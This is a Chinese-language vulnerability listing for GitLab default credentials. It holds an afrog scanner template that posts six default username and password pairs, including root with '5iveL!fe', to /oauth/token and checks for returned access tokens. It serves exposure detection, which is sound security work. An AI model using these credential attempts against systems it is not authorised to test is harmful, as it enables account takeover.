gitlab-weak-login: Gitlab Default Login

日期: 2025-09-01 | 影响软件: Gitlab | POC: 已公开

漏洞描述

Gitlab default login credentials were discovered.

PoC代码[已公开]

id: gitlab-weak-login

info:
  name: Gitlab Default Login
  author: Suman_Kar,dwisiswant0
  severity: high
  verified: true
  description: Gitlab default login credentials were discovered.
  reference:
    - https://twitter.com/0xmahmoudJo0/status/1467394090685943809
    - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab

set:
    hostname: request.url.host
    hosturl: request.url
rules:
    r0:
        request:
            method: POST
            path: /oauth/token
            headers:
                content-type: application/json
            body: |
                {"grant_type":"password","username":"root","password":"5iveL!fe"}
        expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
    r1:
        request:
            method: POST
            path: /oauth/token
            headers:
                content-type: application/json
            body: |
                {"grant_type":"password","username":"root","password":"123456789"}
        expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
    r2:
        request:
            method: POST
            path: /oauth/token
            headers:
                content-type: application/json
            body: |
                {"grant_type":"password","username":"admin","password":"5iveL!fe"}
        expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
    r3:
        request:
            method: POST
            path: /oauth/token
            headers:
                content-type: application/json
            body: |
                {"grant_type":"password","username":"admin","password":"123456789"}
        expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
    r4:
        request:
            method: POST
            path: /oauth/token
            headers:
                content-type: application/json
            body: |
                {"grant_type":"password","username":"admin@local.host","password":"5iveL!fe"}
        expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
    r5:
        request:
            method: POST
            path: /oauth/token
            headers:
                content-type: application/json
            body: |
                {"grant_type":"password","username":"admin@local.host","password":"123456789"}
        expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
expression: r0() || r1() || r2() || r3() || r4() || r5()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/gitlab-weak-login.yaml

相关漏洞推荐